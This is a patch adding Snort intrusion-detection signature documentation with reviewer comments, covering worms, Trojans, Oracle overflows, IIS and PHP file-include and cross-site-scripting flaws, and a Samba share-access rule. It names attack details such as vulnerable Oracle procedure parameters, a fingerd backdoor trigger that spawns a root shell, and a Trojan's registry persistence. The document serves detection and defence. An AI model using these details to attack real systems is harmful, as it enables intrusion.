+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
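Review bot: the Corrective Action section is empty, and the Summary, "network traffic indicating the use of a multimedia application", never names the application or protocol the rule matches, so an operator cannot judge whether the event is a policy violation or expected traffic. Name the client or protocol, and give a corrective action consistent with the Impact section (confirm against the site's acceptable-use policy and block or restrict the traffic at the perimeter if it is not permitted).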
--- /dev/null
+++ b/doc/signatures/720.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+720
+
+--
+Summary:
+This event is generated when email is received from a Post Office Protocol (POP) server that may contain an attachment with the Snow White worm.
+
+--
+Impact:
+Possible system compromise.  The worm can alter system files and registry key settings. 
+
+--
+Detailed Information:
+The Snow White worm, also known as Hybris, may contain text with a unique misspelling of "Suddlently".  This worm attempts to write to the wsock32.dll library.  It may also attempt to alter registry key settings.
+
+--
+Affected Systems:
+Microsoft Win32 systems.
+
+--
+Attack Scenarios:
+The worm is spread by e-mail and attempts to infect other hosts when a user opens the e-mail attachment. 
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event is triggered when an e-mail is received from a POP server that contains the misspelled word "Suddlently".
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Make sure that the suspected infected host has the most current anti-virus software.  
+
+Run a virus scan on the suspected infected host.
+
+--
+Contributors:
+Original rule writer unknown.
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+F-Secure:
+http://www.f-secure.com/v-descs/hybris.shtml
+
+--
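Review bot: the False Positives section, "This event is triggered when an e-mail is received from a POP server that contains the misspelled word "Suddlently"", restates the detection condition instead of describing a false positive; the actual false-positive case is any legitimate mail that quotes the string, such as an anti-virus advisory or a forwarded discussion of the worm. "Steven Alexander<alexander.s@mccd.edu>" in Contributors is missing a space before the address.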
--- /dev/null
+++ b/doc/signatures/2576.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2576
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use an inbuilt procedure to generate triggers
+needed for database replication. The "generate_replication_support"
+procedure contains a programming error that may allow an attacker to
+execute a buffer overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+Affected Systems:
+	Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "package_prefix" or
+"procedure_prefix" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Application Security Inc.
+https://www.appsecinc.com/Policy/PolicyCheck93.html
+
+--
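Review bot: the advice in Detailed Information to set $ORACLE_PORTS to "any" needs a caveat: it makes every Oracle rule inspect all TCP traffic, which raises sensor load and the false-positive rate, so it should be limited to networks where Windows Oracle servers really do listen on non-standard ports. Detailed Information also says the overflow is triggered by "long strings in some parameters" while Attack Scenarios names "package_prefix" and "procedure_prefix"; name the parameters in Detailed Information too so the two sections agree.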
--- /dev/null
+++ b/doc/signatures/1725.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1725
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of an Active Server Page (ASP) using a malformed HTR request. 
+
+--
+Impact:
+Information gathering.  Fragments of the source code of an ASP may be returned possibly disclosing sensitive information.
+
+--
+Detailed Information:
+HTR is an older scripting language still supported by Internet Information Service (IIS).  HTR requests are preocessed by ISM.DLL that improperly evaluates malformed HTR requests.  This may disclose parts of the source code associated with a .asp file referenced in the request. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can craft a malformed request to disclose source code possibly revealing sensitive information. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0063
+
+Bugtraq
+http://www.securityfocus.com/bid/1488
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-031.asp
+
+--
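Review bot: "preocessed" in Detailed Information should read "processed". The Affected Systems block has a stray blank line before "Microsoft IIS 4.0, 5.0" that no other section in the file uses. Since Corrective Action refers to "the patch referenced in the Microsoft link", name the bulletin there (MS00-031, from the URL under Additional References) so the two sections tie together.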
--- /dev/null
+++ b/doc/signatures/1153.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1153
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
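Review bot: the Summary and Detailed Information are generic template text ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") and never say which URI, CGI or request pattern sid 1153 matches, so the documentation does not help an analyst decide whether a hit is a real exploitation attempt; state what the rule looks for, and either fill in Additional References or drop the empty heading.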
--- /dev/null
+++ b/doc/signatures/2870.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2870
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_date
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
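Review bot: the Detailed Information paragraph is broken by a line break before the sentence-ending period: "vulnerability in the procedure alter_priority_date" is followed by a line starting ". This procedure is included in", which looks like a template substitution that left a newline in the procedure name; join the lines. "Oracle Oracle9i" in Affected Systems repeats the vendor name. Additional References is empty and Corrective Action says only "Apply the appropriate vendor supplied patch" without a period or a link to the Oracle alert, so the reader has no way to find the patch.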
--- /dev/null
+++ b/doc/signatures/1002.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid: 1002
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+The HotSaNIC (hotsanic.sourceforge.net) System and Network Info Centre
+can graph the occurence of worms attacks on a server against time. The
+HotSaNIC system displays 'WEB-IIS cmd.exe access ' attempts on the
+server in an image file named thumb-cmd.exe.gif. Each time this image
+is accessed it generates an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Chris McMahon <chris@mcmahon.co.uk>
+
+--
+Additional References:
+
+
+--
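Review bot: the Summary and Detailed Information speak only of "a potential weakness" in IIS, yet the False Positives section reveals that the rule fires on 'WEB-IIS cmd.exe access', that is, a request URI containing cmd.exe; say so in the Summary so the reader knows what triggered the event. "Information gathering possible administrator access." needs punctuation between the two outcomes, "occurence" should be "occurrence", and "Sid: 1002" is on one line while the other files put the number on its own line.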
--- /dev/null
+++ b/doc/signatures/320.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid: 320
+
+-- 
+Summary: 
+This event is generated when access to a known UNIX backdoor deployed by attackers is attempted. In this case it may be a connection to a Trojaned version of fingerd.
+
+-- 
+
+Impact: 
+Remote system compromise leading to a compromise of all resources the host is connected to.
+
+--
+Detailed Information:
+The rule generates an event when access to a "fingerd" backdoor is attempted, this was often found on compromised UNIX machines in the late 1990s. The Trojan finger daemon runs as "root" and is started by inetd with parameters from inetd.conf file unlike the regular finger daemon which runs as "nobody" and replaces the regular "fingerd" binary. It allows its owner to execute several commands remotely by sending a finger request to a specific user. Particularly, the finger request for the user "cmd_rootsh" spawns a root shell bound to the finger port and allows remote command execution.
+
+--
+
+Attack Scenarios: 
+An attacker gains access to a UNIX machine via a remote exploit, then downloads and deploys the "fingerd" trojan. Next, the attacker only needs to send a finger request to gain root access with no password.
+
+-- 
+
+Ease of Attack: 
+The victim host is most likely already compromised.
+
+-- 
+
+False Positives: 
+None known
+
+--
+False Negatives: 
+None known
+
+-- 
+
+Corrective Action: 
+
+Restore the system from a known good backup.
+
+Reinstall the operating system.
+
+--
+Contributors: 
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10070
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0660
+
+SANS:
+http://www.sans.org/y2k/TFN_toolkit.htm
+http://www.sans.org/y2k/fingerd.htm
+
+--
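Review bot: the second sentence of Detailed Information is hard to parse: "The Trojan finger daemon runs as "root" and is started by inetd with parameters from inetd.conf file unlike the regular finger daemon which runs as "nobody" and replaces the regular "fingerd" binary." reads as if the regular daemon replaces the binary. Split it: the backdoor replaces the regular fingerd binary, is launched by inetd with the parameters in inetd.conf, and runs as root, whereas the legitimate daemon runs as nobody. The detail that a request for the user "cmd_rootsh" spawns a root shell is the indicator an analyst needs and should be called out as what the rule matches. Stray blank lines after several "--" separators and trailing spaces after "-- " differ from the other files.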
--- /dev/null
+++ b/doc/signatures/100000665.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000665
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "text" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000737.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000737
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "EditHeader.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "EditHeader.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000711.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000711
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "raids.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "raids.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2128.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2128
+
+--
+Summary:
+This event is generated when an attempt is made to access srsrv.cgi on a
+web server. This may indicate an attempt to exploit a cross-site 
+scripting vulnerability that affects Neoteris Instant Virtual Extranet, 
+an appliance-based VPN solution.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a 
+cross-site scripting vulnerability in Neoteris Instant Virtual Extranet.
+An attacker can pass an argument to srsrv.cgi that bypasses 
+authentication, and can allow the attacker to hijack a legitimate user's
+VPN session. 
+
+--
+Affected Systems:
+Neoteris Instant Virtual Extranet 3.01 and earlier.
+
+--
+Attack Scenarios:
+An attacker can pass a specific argument to srsrv.cgi that bypasses 
+authentication and can hijack a legitimate user's VPN session.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch provided by Neoteris (https://support.neoteris.com).
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7510
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0217
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11608
+
+--
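Review bot: the sections contradict each other: the Summary calls this a cross-site scripting vulnerability, while Detailed Information says the argument to srsrv.cgi "bypasses authentication" and Impact lists "Arbitrary code execution", which is not what cross-site scripting gives an attacker. The consistent description is that injected script runs in a logged-in user's browser and can expose that user's session, which is the session hijack both later sections mention. Attack Scenarios repeats Detailed Information almost verbatim and could instead name the user-targeted link as the delivery mechanism.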
--- /dev/null
+++ b/doc/signatures/937.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+937
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
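Review bot: Impact lists Denial of Service, but neither Detailed Information nor Attack Scenarios explains a DoS vector, and the file never says which FrontPage Server Extensions component or URI sid 937 matches, so the text is a template rather than a description of this rule; add the matched request and, if DoS is intended, the condition that causes it. Additional References is empty for a product with published vendor bulletins.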
--- /dev/null
+++ b/doc/signatures/100000796.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000796
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c1" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2907.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2907
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repobject
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
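Review bot: the same template breakage as the other sys.dbms_repcat entries in this patch: "vulnerability in the procedure drop_snapshot_repobject" is followed by a line starting ". This procedure", so the period is detached from the name; join the lines. "Oracle Oracle9i" doubles the vendor name, Corrective Action lacks a period, and Additional References is empty, leaving no pointer to the Oracle alert that the "appropriate vendor supplied patch" refers to.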
--- /dev/null
+++ b/doc/signatures/2973.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2973
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
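Review bot: 'adminsitrative' in Attack Scenarios should be 'administrative'. Summary and Detailed Information say only that 'private or administrative shares' are being accessed; state which share name or request the rule matches so an analyst can tell this event apart from legitimate administration. Given that Attack Scenarios itself mentions 'direct access to Windows administrative shares', False Positives 'None known' is hard to believe: routine administrative access to the same shares would trigger the rule and should be listed.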
--- /dev/null
+++ b/doc/signatures/733.txt
@@ -0,0 +1,97 @@
+Rule:
+
+--
+Sid:
+733
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
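Review bot: Corrective Action is internally inconsistent. Detailed Information says the registry change adds the QAZ server to 'programs normally started on boot', and the value shown ('StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq') lives under a Run key, yet the next sentence says 'This will start the Trojan each time notepad is executed'; a Run key entry executes at startup, and it is the replaced notepad.exe described two sentences later that runs the Trojan when a user opens Notepad. The key path is written 'Current Version' with a space where Windows uses 'CurrentVersion'. Detailed Information has 'exceutable', 'sever' and lowercase 'windows', and the list of affected operating systems sits there instead of under an Affected Systems heading, which this file lacks while the sibling documents have one.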
--- /dev/null
+++ b/doc/signatures/813.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+813
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
